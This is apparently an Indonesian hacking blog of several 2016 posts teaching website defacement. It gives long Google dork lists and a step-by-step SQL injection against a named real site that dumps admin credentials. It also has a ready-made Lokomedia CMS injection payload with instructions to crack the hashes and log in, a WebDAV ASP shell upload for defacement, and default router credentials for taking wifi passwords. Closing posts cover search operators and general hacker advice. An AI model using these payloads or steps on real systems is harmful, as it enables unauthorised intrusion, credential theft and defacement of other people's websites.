Popular Posts

Sabtu, 29 Oktober 2016

Cara Deface Website Menggunakan SQL Injection Manual

hello, kali ini Saya akan membagikan tutorial cara deface web menggunakan metode SQL Injection MANUAL
apa itu SQL INJECTION .?
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error
Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url

Contoh : http://situsq.com/berita.php?id=14’
http://situsq.com/berita.php?id=’14
Apabila terlihat pesan error seperti ini :

You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
Maka bisa dipastikan situs tersebut terdapat celah SQL Injection…
dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR, 
Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:
Hackbar
Sekarang kita mulai SQL Injectionnya
Pertama yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: filesize()
“id=” & intext:”Warning: require()
WOW banyak amat -_-, memang banyak sob soalnya dork buat cari target itu ngak cukup 1 dan juga ngak sekali cari ketemu,
Sebenarnya dork itu banyak tapi kemnculan dork-dork baru tergantung kreatifitas individu masing-masing
oke langsung saja Copas ( copy paste ) salah satu dork tersebut ke google search
Setelah itu kita pilih salah satu url dari hasil dork tersebut
contoh :
http://www.zenfocus.com/partners.php?id=2
nah sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung

teradapat VULN
teradapat VULN
Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali
Contoh:
http://www.zenfocus.com/partners.php?id=2 order by 1–  no error
http://www.zenfocus.com/partners.php?id=2 order by 2–  no error
http://www.zenfocus.com/partners.php?id=2 order by 3–  no error
http://www.zenfocus.com/partners.php?id=2 order by 4–  no error
http://www.zenfocus.com/partners.php?id=2 order by 5–  no error
http://www.zenfocus.com/partners.php?id=2 order by 6–  no error
http://www.zenfocus.com/partners.php?id=2 order by 7–  error
eror table ke 7
eror table ke 7
Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6–

Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6–

Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda —
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–
bahan post 2
Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name=
bahan post 2
dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –>  MySQL –> MySQL CHAR()
bahan post 2
setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok 
sehingga perintah kita menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–
Setelah itu tekan Execute
Dan hasilnya
bahan post 2
Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin—
bahan post 2
tekan Execute
dan hasilnya
bahan post 2
Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat soba

Jumat, 21 Oktober 2016

Cara Deface Website Dengan SQL Lokomedia

Hallo blogger, maaf baru ngepost lagi soalnya kesibukan di dunia nyata.Kali ini saya akan ngebahas cara ngedeface website dengan celah/bug yang ada pada cms lokomedia.Berbicara soal teknik ini, pasti sudah tau di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini.


Dork : - inurl:kategori-23-hiburan.html
           - inurl:hal-tentang-kami.html
           - inurl:statis-1-pengantar.html
           - inurl:statis-19-beasiswa.html
           - inurl:statis-22-kerjasama.html
           - inurl:statis-1-profil.html

           - inurl:statis-2-profil.html

           - inurl:statis-3-strukturorganisasi.html
 
exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+


1.Langsung gunakan dork ke search engine google
2.Kalo sudah dapat targetnya misalnya seperti ini  http://site.com/kategori-23-hiburan.html

3.Masukan explotnya seperti ini http://site.com/kategori-23 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-hiburan.html




4.Kemudian tekan CTRL+U




5.Karena passwordnya masih dakam bentuk md5 maka harus di decrypt,saya menggunakan hashkiller bisa cari di google
6.Kemudian masukan username dan password yg tadi di dapatkan
Untuk login biasanya di :
www.target.c0li/admin
www.target.c0li/adminweb
www.target.c0li/administrator
- www.target.c0li/redaktur

Nah kalo udah masuk berarti anda bisa ngubah apapun,ini hanya untuk sharing tutorial,untuk bertujuan membantu newbie seperti saya

Kamis, 20 Oktober 2016

Mengenal Deface Website

 
 
Deface adalah kegiatan mengubah halaman website orang lain tanpa sepengetahuanorang tersebut pastilanya ini adalah kejahatan dunia cyber. Deface terkenal juga dengan sebutan cybergraditti yaitu corat-coret website tertentu. Deface itu dilakukan dengan memanfaatkan kelemahan dari website tersebut.
Google digunakan sebagai salah satu mesin pencari yang powerfull untuk mencari informasi yang tepat dan akurat. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, terlepas dari tujuan itu baik atau buruk. Di bawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting. Perintah – perintah tersebut antara lain :
1. intitle:
”intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang dimaksud.
Sebagai contoh pada pencarian, ”intitle: password admin” (tanpa tanda kutip). Pencarian akan mencari page yang mengandung kata ”password” sebagai judulnya dengan prioritas utama ”admin”.
Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks ”allintitle:” untuk pencarian secara lengkap. Sebagai contoh pada pencarian ”allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu ”admin” dan ”mdb”.
2. inurl:
”inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl: database mdb”.
Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang ”database mdb”. Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks ”allinurl:” untuk mendapatkan list url tersebut.
Sebagai contoh pencarian ”allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang ”etc” dan ”passwd”. Tanda garis miring slash (/) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.
3. site:
”site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: ”waveguide site:ugm.ac.id” (tanpa tanda kutip). Pencarian akan mencari topik tentang waveguide pada semua halaman yang tersedia pada domain ugm.ac.id.
4. cache:
”cache:” akan menunjukkan daftar web yang telah masuk ke dalam indeks database Google, yang berhasil didapatkan oleh Google Crawler. Sebagai contoh:
”cache:detik.com”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page detik.com.
5. filetype:
”filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : ”filetype:pdf” ”Linux Hacking” (tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi ”.pdf” yang mengandung kata Linux dan Hacking.
6. link:
”link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list web pages yang memiliki link pada web page special. Sebagai contoh: ”link:www.detik.com” akan menunjukkan daftar web page yang memiliki point link pada halaman situs Detik.
7. related:
Sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.Sebagai contoh: ”related:www.detik.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Detik.
8. intext:Sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
”intext:admin” (tanpa tanda kutip), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Dengan menggunakan beberapa kata kunci di atas, Google akan menjadi ”pedang” yang bisa dimanfaatkan untuk menggali informasi yang tersembunyi, tak terduga, bahkan sangat penting bagi suatu pihak. Beberapa pihak yang rajin melakukan auditing (pemeriksaan) keamanan suatu sistem melalui jaringan internet biasanya menggunakan google sebagai sarana praktis untuk footprinting (penggalian data sistem yang akan diaudit). Pada kesempatan mendatang, akan kita coba menguak beberapa rahasia yang bisa didapat, hanya dengan google dan kecerdasan otak kanan kita.

Rabu, 19 Oktober 2016

Cara Deface Website Menggunakan Webdav






Kali ini saya akan berbagi cara deface website menggunkan webdav, bagi newbie seperti saya tutor ini mungkin sangat bermanfaat untuk ajang belajar, tutorial ini untuk belajar bukan untuk merusak ataupun menghancurkan website.


  1. Download rootkit dan umer.asp disini
  2. Buka rootkit (Hmei7) lalu klik tab webdav, pilih asp pilih asp shell maker
  3. klik setting dan setelah itu klik Load shell from file
  4. Cari dimana anda ekstrak file Umer.asp lalu open
  5. Setelah itu klik Add site untuk memasukkan alamat website yang menjadi target untuk di deface. Untuk mencari target cari di google menggunakan dork ini inurl:.com/Hmei7.asp;.txt  
  6. Klik tombol serang dan tunggu beberapa saat
  7. Klik "Upload file to..."  klik "choose file", cari file html yang akan kalian upload, lalu "open" setelah itu klik "upload"
  8. Buka file html yg telah kalian upload misal file yg saya upload judulnya "rezpect.txt" 
  9. Buka http://site.name/rezpect.txt. tergantung nama file yg kalian upload.  
 Ini adalah Contoh website yang saya deface



 

Senin, 17 Oktober 2016

Cara Hack Wifi Warnet

cara hack wifi warnet menggunakan client server,Berbicara mengenai ini saya sering mendengar dari kawan-kawan netizen yang penasaran dengan trik membobol wifi.Informasi terbaru kali ini akan mengulas sajian trik membobol / hack password jaringan wifi dengan mudah cepat.Sebelum membobol wifi kita bahas terlebih dahulu tentang wifi,kelebihan dari wifi yaitu tidak perlu menggunakan kabel untuk dapat terhubung dengan jaringan internet.Nah dari kelebihan itu ada kelemahan dari wifi tersebut yaitu mudah terbobol.

pada tutorial kali ini kita akan mengupasnya dengan tuntas tentang bagaimana mengetahhui password tersebut baik menggunakan laptop, smartphone android dan perangkat lainnya, oke langsung saja kita simak caranya seperti di bawah ini.

  • Pertama buka browser seperti mozilla firefox,google crome,opera,dll
  • Nah masukan ip address di url yaitu 192.168.1.1 atau 192.168.100.1
  • Masukan user dan passwornya
192.168.1.1
user : admin
password : admin
192.168.100.1
user : telecomadmin
password : admintelecom
  • Nah kalo udah masuk anda bisa melihat passwor wifinya
Nah itulah tadi beberapa cara yang dapat kita lakukan untuk dapat mengetahui password wifi warnet setelah anda terhubung dengan jaringan tersebut anda bisa melakukan browsing, chatting maupun download lagu atau pun video sesuka anda, oke mungkin itu saja pembahasan kita kali ini semoga dapat bermanfaat dan bagi anda semuanya, selamat mencoba.

Sabtu, 15 Oktober 2016

Cara Mudah Menjadi Hacker

Hacker atau Peretas biasanya identik dengan dunia kejahatan jika memang tidak dimanfaatkan dengan baik. Mereka lebih banyak diam dengan menyembunyikan identitasnya, tapi dibalik itu mereka adalah Seorang Profesional yang tak ingin diketahui oleh orang lain. Di mana Hacker adalah mereka yang mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs, mereka punya etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja. Sedangkan Cracker adalah mereka yang mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan bagi dirinya atau kelompoknya. Hacker sejati bukanlah tipe orang yang mudah menyerah kalah. Mereka memiliki daya juang yang tinggi, dan jarang diantaranya yang bertipe suka pamer kemampuan.

  1. Berpikirlah Seperti Seorang Hacker
Bagaimana seorang hacker berpikir? Apa yang ada di otak seorang hacker? Seorang hacker selalu memikirkan bagaimana caranya menyelesaikan suatu masalah dan bagaimana caranya membuat sesuatu. Seorang hacker juga sangat menghargai kebebasan dan mau menolong dengan sukarela. Kalau ingin menjadi hacker, seseorang harus memiliki attitude ini.
Dunia ini dipenuhi berbagai permasalahan yang sangat menarik untuk diselesaikan. Dengan mencoba menyelesaikan permasalahan-permasalahan ini, seseorang akan mempertajam kemampuan dan melatih kecerdasannya. Ingat juga bahwa suatu permasalahan tidak perlu diselesaikan lebih dari sekali. Oleh karena itu jangan pernah merasa enggan untuk membagikan informasi dan solusi terhadap suatu permasalahan. Ini adalah tanggung jawab moral seorang hacker.
Budaya hacker adalah suatu budaya tentang pengakuan. Seseorang tidak dapat menyebut dirinya sendiri sebagai hacker. Seseorang tidak akan pernah benar-benar menjadi hacker sampai orang lain (para hacker) menyebutnya sebagai hacker. Untuk mendapatkan pengakuan ini tentu saja butuh usaha, kerja keras, dan kontribusi kepada komunitas. Beberapa hal yang dapat dilakukan untuk berkontribusi kepada komunitas:
  • Buatlah perangkat lunak (program) open source.
  • Investasikan waktu luang untuk membantu memperbaiki perangkat lunak open source dengan melakukan debugging.
  • Publikasikan informasi yang berguna.
  • Berikan bantuan untuk menjaga infratstruktur tetap berjalan.
  1. Pelajari Pemrograman
Pelajarilah bagaimana caranya menulis program. Untuk benar-benar menjadi seorang hacker kemampuan pemrograman sangatlah penting. Para hacker menyelesaikan berbagai permasalahan yang mereka temui dengan menulis program. Cara paling mudah untuk mempelajari cara menulis program adalah dengan membaca dokumentasi yang ditulis oleh para masternya. Kemudian cobalah menulis program sedikit demi sedikit. Teruslah berlatih untuk mencapai suatu level kemampuan pemrograman yang cukup baik. Jika sudah cukup percaya diri dengan suatu bahasa pemrograman, cobalah untuk mempelajari bahasa pemrograman lainnya. Mempelajari beberapa bahasa pemrograman akan mengajarkan kita memandang suatu permasalahan dari sisi lain.
  1. Kenali dan Gunakan Unix/Linux
UNIX dan sistem operasi yang mengadopsi konsep yang sama seperti Linux dan BSD adalah sistem operasi utama Internet. Namun untuk menggunakan UNIX seseorang mungkin harus mengeluarkan uang dalam jumlah yang cukup besar. Solusinya adalah menggunakan sistem operasi yang open source seperti GNU/Linux (dengan berbagai pilihan distribusi) dan FreeBSD (dan turunan BSD lainnya). Pelajarilah Linux, gunakan distro yang mudah dan ramah untuk pemula seperti Ubuntu. Pasanglah sistem operasi ini di PC atau laptop dan gunakan untuk bekerja/bermain sehari-hari.
Mungkin sebagian orang akan berpikir mengapa harus menggunakan Unix/Linux/FreeBSD? Apakah tidak bisa menggunakan sistem operasi lain? Sistem operasi tertutup seperti Microsoft Windows dan Mac OS tidak akan mengizinkan seseorang untuk mempelajari kode sumbernya apalagi melakukan modifikasi. Belajar menjadi hacker menggunakan sistem operasi seperti itu ibarat belajar menari dengan tubuh dicor.
  1. Pelajari HTML
HTML adalah mainan hacker yang telah mengubah dunia. Belajarlah bagaimana cara menggunakan World Wide Web dan menulis kode HTML. Menggunakan Word Wide Web bukan berarti sekedar menggunakan browser dan berselancar di dunia maya melainkan bagaimana caranya membangun suatu situs menggunakan bahasa penanda web (web markup language). Cobalah membangun home page menggunakan sintaks-sintaks HTML.

Bagaimana Cara Menjadi Hacker. Caranya adalah sebagai berikut :
  1. Persiapkan Jiwa
Persiapan jiwa ini adalah hal yang paling utama dalam menjadi seorang hacker, adapun hal yang perlu dipersiapkan adalah:
  • Mental dan psikologi: hal ini dibutuhkan karena seorang hacker akan mendapatkan banyak cobaan yang sering kali membuat down dan kadang membuat lupa diri. Seperti caci maki, hinaan, sanjungan dan perkataan manis.
  • Kesabaran, ketabahan dan keikhlasan: hal ini merupakan kunci kesuksesan seorang hacker dimana dengan hal ini akan membuat seorang hacker tidak akan pernah menyesali setiap tindakan yang diperbuat.
  • Semangat, usaha, kemauan, pantang menyerah dan kerja keras: hal ini dibutuhkan seorang hacker untuk berjuang menggapai yang terbaik didalam kehidupan yang dijalani, karena menjadi seorang hacker tidak mudah dan butuh waktu yang cukup untuk memahami setiap seluk beluk ilmu pengetahuan.
  • Percaya dan berserah diri hanya kepada Tuhan Yang Maha Esa: hal ini menjadi pondasi paling penting dan salah satu motto yang digunakan oleh BinusHacker Family yaitu “Tuhan Hanya Engkau Yang Esa” dimana dengan hal ini semua akan dikembalikan kepada Sang Pencipta dan menyatakan bahwa Ilmu Pengetahuan itu Tanpa Batas.
  1. Persiapkan Raga
Persiapan raga merupakan langkah kedua yang perlu dilakukan oleh seorang hacker, dimana raga harus dibangun sedemikian rupa agar bisa mencapai target yang diingikan. Hal yang perlu dipersiapkan adalah:
  • Kesehatan dan kebugaran: hal ini diperlukan agar seorang hacker tetap fit dalam menghadapi setiap tantangan dan perjuangan dalam mempelajari dan mencapai target yang sudah ditetapkan serta kemampuan memory, daya pikir otak, nurani, panca indra bisa dimaksimalkan.
  • Aktif Olahraga: hal ini diperlukan untuk menunjang latihan tubuh agar terhindar dari berbagai ancaman. Misalkan olahraga beladiri untuk melindungi diri ketika ada ancaman, fitness agar tubuh tetap aktif dan sehat  terjaga.
  1. Persiapkan Perbuatan
Persiapan perbuatan adalah langkah ketiga  untuk menjadi seorang hacker, dimana langkah yang perlu dijalani adalah langkah positif dalam kehidupan, senantiasa beramal dan beribadah. Mengurangi, menghindari dan meninggalkan hal-hal negatif adalah perjuangan panjang dan paling berat untuk seorang hacker.
  • Belajar, Berbagi, Senantiasa Update dan Meningkatkan Kemampuan: hal ini menjadi pondasi paling penting dan salah satu motto yang digunakan oleh BinusHacker Family untuk bersama-sama meningkatkan kualitas dan kuantitas kemampuan yang dimiliki.
  • Saling Tolong Menolong, Persahabatan, Hindarkan SARA: hal ini diperlukan agar seorang hacker bisa berkontribusi dalam kehidupan yang global dimana semua sangat universal. Dengan menjadi seorang hacker maka diharuskan memiliki pandangan yang luas sehingga bisa bertindak dengan netral, baik, adil dan bijaksana.
Ada 5 hal penting yang perlu dipelajari oleh seorang Hacker :
  1. Logika (Logic)
Seorang hacker harus senantiasa menggunakan logika dimana hal ini menjadi sebuah pertimbangan akal untuk menghasilkan sesuatu yang baik, benar dan tepat. Manusia diberikan kelebihan oleh YME untuk hal ini, maka manfaatkan secara maksimal.
Logika yang sering digunakan dalam bahasa pemrograman adalah OR, AND, NOT, XOR, NAND, dll. Beberapa program tersusun atas komponen program IF..THEN…ELSE, FOR..TO..DO, WHILE , CASE..OF dan lain-lainnya. Logika ini kemudian akan dikolaborasikan dengan matematika untuk menghasilkan sesuatu yang bernilai Benar (True) atau Salah (False) seperti (<, >, =, +, -, dll).
  1. Perangkat Keras (Hardware)
Seorang hacker harus mengetahui seluk beluk perangkat keras, karena perangkat keras merupakan dasar dari pembentukan teknologi. Perangkat keras disini adalah mengerti seluk beluk pengkabelan, chip, mainboard, switch, hub, elektronika, dll. Apabila seorang hacker sudah memahami perangkat keras, maka akan lebih mudah dalam membuat instruksi untuk perangkat lunaknya. Pernah melihat James Bond & Mission Impossible? Nah, diluarsana banyak orang luarbiasa yang memahami hardware sangat dalam.
Yang perlu dipelajari lebih dalam dari perangkat kerasa adalah komponen pada bagian-bagian berikut:
  • Input Device (Unit Masukan: Keyboard, Mouse): media untuk memasukkan data dari luar ke dalam suatu memori dan processor.
  • Process Device (Unit Pemrosesan: CPU, Microchip,RAM): media untuk mengolah inputan guna menghasilkan informasi yang diperlukan.
  • Output Device (Unit Keluaran: Monitor, Scanner, Speaker): media untuk mengeluarkan hasil informasi.
  • Backing Storage ( Unit Penyimpanan: Harddisk, Disk): media untuk melakukan penyimpanan data dan informasi.
  • Periferal ( Unit Tambahan: USB, Modem): media tambahan yang digunakan untuk mendukung proses kerja perangkat keras.
  1. Perangkat Lunak (Software)
Seorang hacker akan mempelajari software sebagai instruksi kepada hardware untuk melakukan perintah-perintah yang diinginkan. Software ini dibangun dari berbagai bahasa, dimana bahasa yang perlu dipelajari dalam bahasa mesin adalah 0, 1 dan analog. Sebagai dasar adalah bahasa pemrograman adalah assembly. Urutan yang tepat sebagai berikut saya kutip dari wikipedia:
